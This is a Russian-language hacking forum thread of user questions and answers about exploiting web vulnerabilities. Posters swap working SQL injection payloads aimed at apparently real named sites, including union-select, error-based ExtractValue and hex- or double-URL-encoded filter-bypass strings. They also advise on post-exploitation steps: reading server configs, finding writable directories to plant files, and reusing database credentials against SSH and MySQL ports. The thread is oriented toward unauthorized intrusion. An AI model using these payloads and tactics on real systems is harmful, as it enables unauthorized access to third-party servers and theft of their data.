Ваши вопросы по уязвимостям.

Попробуй прочитать конфиги апач\нгинкс, вполне вероятно, что твой сайт и бд находятся на разных серверах, впрочем не исключена возможность, что на сервере БД тоже поднят апач, и сервер доступен из веба, действия аналогичные, читаешь конфиг, получаешь путь, ищешь врайтабельную диру, и льешь. можешь попробовать почитать конфиги настройки сети (например в центосе /etc/sysconfig/network-scripts/ifcfg-eth0 (но скорее всего прав не хватит, раз на раз не приходится)), можешь посмотреть /etc/hosts может там есть, что полезного.

судя по passwd, на серваке стоит webalizer и memcached, попробуй почитать webalizer, проскань сеть на наличие открытых портов 11211, 3306, глянь логин и пас из mysql.user, попробуй эти пары в сети на порты 22, 3306

вообще вариантов гора

 

обясните как. мне очень интересно. как concat('<?php phpinfo() ?>') будет исполнятся. у меня фантазии не хватает.
может какой то индус-кодер во сне написал скрипт где параметры переданные скриптом исполняются на стороне сервера. но только из за этого не стоит написать что иногда работает

это же не метафизика в конце концов

 

Скинул пример в ЛС.
Посмотри скрипты, может будет ясно в чем причина.

 

возможно как-то раскрутить?)

Code:

http://srv3.lookmy.info/portal/13/europeisky/index.php?id=15998&show=4nalbum&do=showgall&gid=28005' 

 

На соседних поддоментах имеются более перспективные варианты:

Code:

http://generator.lookmy.info/index.php?id=2677&show=4nalbum&do=showgall&gid=3471 union select 1,@@version,3,4,5,6,7,8-- w

хотя и там не всё так "светло"

 

Возможно, не стоит танцевать с фильтрами, а просто попинать все из http://srv3.lookmy.info/portal/13/ ? К тому же, там лежат многие бекапы, а порт мускула открыт в мир.

 

Code:

[I]?id=%001'or(ExtractValue(1,con[/I][I]cat(0x3a,(select(count(*))fr[/I][I]om(website.user)))))or'[/I]

No problem

Code:

[I]28006[/I][I]%20and%200%20UNIO[/I][I]N%20SELECT%200x3120616e64203[/I][I]020554e494f4e2053454c454354[/I][I]2076657273696f6[/I][I]e28292c2032202d2d[/I]

Первая скуля подходит даже больше, чем вторая. Инъекция в категориях, там обычно всегда более 1 запроса.

 

как обойти фильтрацию очки при mysql запросе?

 

Иногда бывает что фильтры не работают при пост запросе

 

спс, а как из точки получить такое содержимое, что это за тип шифрования?
я примерно догадываюсь что это может быть хекс, только вместо 0х поставили % но как получили второй вариант?

---------------------------------------------
никто не в курсе чтоза движок в котором префикс таблиц в БД начинается на pmd, pmd_admin, pmd_users и тд,?? уже насобиралась куча таких сайтов и никак не могу найти админку

 

у phpMyDirectory такие.
site.com/cp/

 

qaz, это обычный url енкодинг, то бишь хекс с префиксом процента.
Иногда бывает, что один параметр участвует в двух запросах, передается с одного хоста на другой, на котором может стоять обработчик всех параметров или на самом хосте они дважды декодируются по каким-либо причинам. Как параметр пройдёт первый хост, он декодируется в привычную форму и из %2527 как пример получится %27 и этот %27 уже на втором хосте в конечном итоге превратится в привычный всем нам апостроф '

 

http://web-master.pp.ru/info/05.shtml
Помогает когда фильтруются и другие символы.

%2e url кодирование.
%252e двойное url кодирование.

 

Имеется уязвимость на site.com , вида site.com/x.php?id=-1' union+select+1,2,3,4,5,6,7,8,9,10-- '
Колонки на вывод - 1 и 6.
Вывести через них database(), user() не получается, т.к. в ответ получаю пустое место.
Зато можно вывести версию @@version , version() - 5.0.95-log
При других запросах на вывод таблиц и т.д. - либо пустое место, вместо результата (как с user() ), либо ошибку Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in

Есть ли какие-нибудь идеи, как узнать пользователя и текущую базу данных из приведённых мною выше данных?

 

Aniweste, фильтр? Попробуйте определить, на что. Или length(database()) = 0?

Code:

[I]site.com/x.php?id=-1' union+select+US[/I][I]ER,2,3,4,5,DB,7,8,9,10+from+info[/I][I]rmation_schema.PROCESS[/I][I]LIST+WHERE+info+rlik[/I]e[I]+0x50524f43--+[/I]

В information_schema есть почти вся инфа, см. SHOW TABLES FROM information_schema и SELECT * FROM table LIMIT 5 на локалхосте.

 

Как раскрутить такое:

Code:

SELECT * FROM table WHERE ... ORDER by table.field LIMIT $limitstart, $limit

где $limitstart, $limit - не фильтруются.

 

Для инъекции в LIMIT после ORDER BY сейчас нет векторов атак (возможно и не будет).

 

Всё равно ошибка Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in.
Нечаянно, пока дописывал, проверил
site.com/x.php?id=-1' union+select+1,2,3,4,5,6,7,8,9,10+fro-- - нет ошибки, site.com/x.php?id=-1' union+select+1,2,3,4,5,6,7,8,9,10+from-- - есть ошибка. Но думаю, что это бред